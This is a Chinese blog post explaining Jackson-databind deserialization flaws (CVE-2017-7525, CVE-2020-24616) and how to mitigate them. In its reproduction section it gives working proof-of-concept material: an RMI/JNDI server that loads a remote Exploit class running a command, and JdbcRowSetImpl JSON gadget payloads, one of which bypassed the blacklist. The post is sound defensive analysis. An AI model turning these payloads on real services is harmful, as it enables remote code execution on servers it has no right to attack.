Jackson-databind引发的漏洞问题分析
前言
最近公司内部提供了一份应用高危漏洞的清单,其中提到了fastjson和jackson,因为之前对fastjson因为多态问题引发的反序列化问题有过了解,所以打算也做一个简单的分析。
漏洞简述
2020年08月27日,360CERT监测发现 jackson-databind 发布了 jackson-databind 序列化漏洞 的风险通告,该漏洞编号为 CVE-2020-24616 ,漏洞等级:高危,漏洞评分:7.5。br.com.anteros:Anteros-DBCP 中存在新的反序列化利用链,可以绕过 jackson-databind 黑名单限制,远程攻击者通过向使用该组件的web服务接口发送特制请求包,可以造成 远程代码执行 影响。
受影响的版本:fasterxml:jackson-databind: <2.9.10.6,该版本还修复了下述利用链:
- org.arrahtec:profiler-core
- com.nqadmin.rowset:jdbcrowsetimpl
- com.pastdev.httpcomponents:configuration
上述 package 中存在新的反序列化利用链,可以绕过 jackson-databind 黑名单限制,远程攻击者通过向使用该组件的web服务接口发送特制请求包,可以造成 远程代码执行 影响。
漏洞分析
其实此漏洞和前几年jackson爆出来的另外一个漏洞(CVE-2017-7525)是一脉相承的,都是利用反序列化远程执行代码;至于为什么会出现这个问题,其实归根结底和多态有关,下面做一个简单的分析;
序列化中的多态问题
我们平时见得最多的json格式可能像下面这样:
{"fruit":{"name":"apple"},"mode":"online"}里面是没有任何类信息的,拿到json字符串直接通过相关方法转化为对象:
public <T> T readValue(String content, Class<T> valueType)像以上这种情况基本上是不会有什么问题的,但是很多业务中有多态的需求,比如像下面这样:
//水果接口类
public interface Fruit {
}
//通过指定的方式购买水果
public class Buy {
private String mode;
private Fruit fruit;
}
//具体的水果类--苹果
public class Apple implements Fruit {
private String name;
}
//具体的水果类--香蕉
public class Banana implements Fruit {
private String name;
}可以发现这里的Buy对象里面存放的是Fruit,并不是具体的某种水果,如果这时候你去序列化:
Banana banana = new Banana();
banana.setName("banana");
Buy buy = new Buy("online", banana);
ObjectMapper mapper = new ObjectMapper();
// 序列化
String jsonString = mapper.writeValueAsString(buy);
System.out.println("toJSONString : " + jsonString);
// 反序列化
Buy newBuy = mapper.readValue(jsonString, Buy.class);
banana = (Banana) newBuy.getFruit();
System.out.println(banana);序列化是可以成功的,结果如下所示:
{"mode":"online","fruit":{"name":"banana"}}但是在反序列化的时候,程序中完全没法知道fruit到底是苹果还是香蕉,所以会直接报错:
Exception in thread "main" com.fasterxml.jackson.databind.exc.InvalidDefinitionException: Cannot construct instance of `com.jackson.Fruit` (no Creators, like default construct, exist): abstract types either need to be mapped to concrete types, have custom deserializer, or contain additional type information面对这种问题,jackson提供了相关的技术支持,主要有以下这么两种:
- 全局DefaultTyping机制
- 为Class添加@JsonTypeInfo
多态问题支持
全局DefaultTyping机制相对来说比较简单,一个配置就解决了;而@JsonTypeInfo注解模式相对来说比较麻烦;
全局DefaultTyping机制
只需要对ObjectMapper开启此配置即可:
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping(ObjectMapper.DefaultTyping.NON_FINAL, JsonTypeInfo.As.PROPERTY);这样再去执行刚刚的序列化方法,结果会是如下这样:
{"@class":"com.jackson.Buy","mode":"online","fruit":{"@class":"com.jackson.impl.Banana","name":"banana"}}可以发现在json里面包含了类信息,这样在反序列化的时候,就能识别具体的类,这样就能反序列化成功;
JsonTypeInfo注解模式
此种模式需要针对每种类型做专门的处理,相对来说比较麻烦,我们需要在Fruit接口中做处理:
@JsonTypeInfo(use = JsonTypeInfo.Id.NAME, include = JsonTypeInfo.As.PROPERTY, property = "type")
@JsonSubTypes(value = { @JsonSubTypes.Type(value = Apple.class, name = "a"),
@JsonSubTypes.Type(value = Banana.class, name = "b") })
public interface Fruit {
}可以发现如果发现是子类Apple,就用字符a代替;如果发现是子类Banana,就用字符b代替;序列化的结果如下:
{"mode":"online","fruit":{"type":"b","name":"banana"}}这种模式通过在json字符串中添加了具体类的type,这样在反序列化的时候也同样可以成功;
漏洞重现
以上介绍了两种jackson在解决多态问题的方案,那问题出在哪里;其实问题的根源就出在全局DefaultTyping机制中对生成的json字符串中包含了类信息,这样对攻击者来说就相当于留了一个后门,可以通过在json字符串中传入一些特殊的类,对服务器引发灾难性后果;上面也提到此问题其实在(CVE-2017-7525)漏洞中已经出现,这里可以做一个简单模拟;
CVE-2017-7525重现
当时要求的版本是不低于2.8.9,这里直接使用此版本来模拟;
<dependency>
<groupId>com.fasterxml.jackson.core</groupId>
<artifactId>jackson-databind</artifactId>
version>2.8.10</version>
</dependency>一个常见的攻击类是:com.sun.rowset.JdbcRowSetImpl,此类的dataSourceName支持传入一个rmi的源,然后可以设置autocommit自动连接,执行rmi中的方法;这里首选需要准备一个RMI类:
public class RMIServer {
public static void main(String argv[]) {
Registry registry = LocateRegistry.createRegistry(1098);
Reference reference = new Reference("Exploit", "Exploit", "http://localhost:8080/");
registry.bind("Exploit", new ReferenceWrapper(reference));
}
}这里的Reference指定了类名,以及远程地址,可以从远程服务器上加载class文件来实例化;准备好Exploit类,编译成class文件,然后把他放在本地的http服务器中即可;
public class Exploit {
public Exploit() {
Runtime.getRuntime().exec("calc");
}
}这里我们做了一个简单的模拟,让服务器在本地调用计算器;
有了以上这些,下面要准备攻击的json字符串,如下所示:
{"@class":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1098/Exploit","autoCommit":true}反序列化相关代码如下:
System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
ObjectMapper objectMapper = new ObjectMapper();
objectMapper.enableDefaultTyping(ObjectMapper.DefaultTyping.NON_FINAL, JsonTypeInfo.As.PROPERTY);
String json = "{\"@class\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://localhost:1098/Exploit\",\"autoCommit\":true}";
objectMapper.readValue(json, Object.class);在反序列化的时候,先执行setDataSourceName方法,然后setAutoCommit的时候会自动连接设置的dataSourceName属性,最终获取到Exploit类执行其中的相关操作,以上的程序会在本地调起计算器;
如果做升级处理,升级到2.8.10版本,同样执行以上的代码,结果如下:
Exception in thread "main" com.fasterxml.jackson.databind.JsonMappingException: Invalid type definition for type Lcom/sun/rowset/JdbcRowSetImpl;: Illegal type (com.sun.rowset.JdbcRowSetImpl) to deserialize: prevented for security reasons可以发现JdbcRowSetImpl已经进入了jackson的黑名单中;但是黑名单往往是不全的,后续可能经常爆出漏洞,比如这次的漏洞;
CVE-2020-24616重现
这样同样使用漏洞前的版本,我们使用2.9.10.5版本,存在漏洞的com.nqadmin.rowset.jdbcrowsetimpl,引入如下:
<dependency>
<groupId>com.fasterxml.jackson.core</groupId>
<artifactId>jackson-databind</artifactId>
<version>2.9.10.5</version>
</dependency>
<dependency>
<groupId>com.nqadmin.rowset</groupId>
<artifactId>jdbcrowsetimpl</artifactId>
<version>1.0.2</version>
</dependency>再次提供攻击json字符串:
{"@class":"com.nqadmin.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1098/Exploit","autoCommit":true}执行上面同样的代码,使用如上json字符串,同样能够调起本地计算器;下面要做的就是升级版本:>2.9.10.6;再次执行结果如下:
Exception in thread "main" com.fasterxml.jackson.databind.exc.InvalidDefinitionException: Invalid type definition for type `com.nqadmin.rowset.JdbcRowSetImpl`: Illegal type (com.nqadmin.rowset.JdbcRowSetImpl) to deserialize: prevented for security reasons可以发现com.nqadmin.rowset.JdbcRowSetImpl已经进入黑名单;
漏洞总结
可以发现类似的漏洞在很多json序列化工具中都有,黑名单的方案其实也是比较临时性的,想要彻底解决这个问题其实是很难的,因为你不知道以后还会出现什么jar包有远程执行的功能,所以下面对jackson序列化工具做一点使用上的总结;
不要使用DefaultTyping
可以发现问题的根源在于DefaultTyping方式导致在json字符串中出现了类信息,其实上面也介绍了完全可以通过JsonTypeInfo方式代替;只不过相对来说麻烦点,但是对于安全性来说这点不算什么;
可以发现新版jackson中已经不建议使用DefaultTyping了,此方法已经被标识为@Deprecated
@Deprecated
public ObjectMapper enableDefaultTyping(DefaultTyping applicability, JsonTypeInfo.As includeAs) {
}反序列化指定具体类
其实我们可以发现这些黑名单中的类,我们平时很少使用,我们大部分情况都使用的是一些业务类,这样我们在反序列化的时候尽量使用具体类,不要使用Object,如上面的代码:
objectMapper.readValue(json, Object.class);如果我们这里填的是具体的业务类,如果真的接收到一个攻击json字符串,其实程序首先也会对json中的类信息是否和指定的类信息是否一致,如果不一致,直接不会执行:
objectMapper.readValue(json, Banana.class);上面再反序列化的时候,直接报错:
Exception in thread "main" com.fasterxml.jackson.databind.exc.InvalidTypeIdException: Missing type id when trying to resolve subtype of [simple type, class com.jackson.impl.Banana]: missing type id property 'type'感谢关注
可以关注微信公众号「回滚吧代码」,第一时间阅读,文章持续更新;专注Java源码、架构、算法和面试。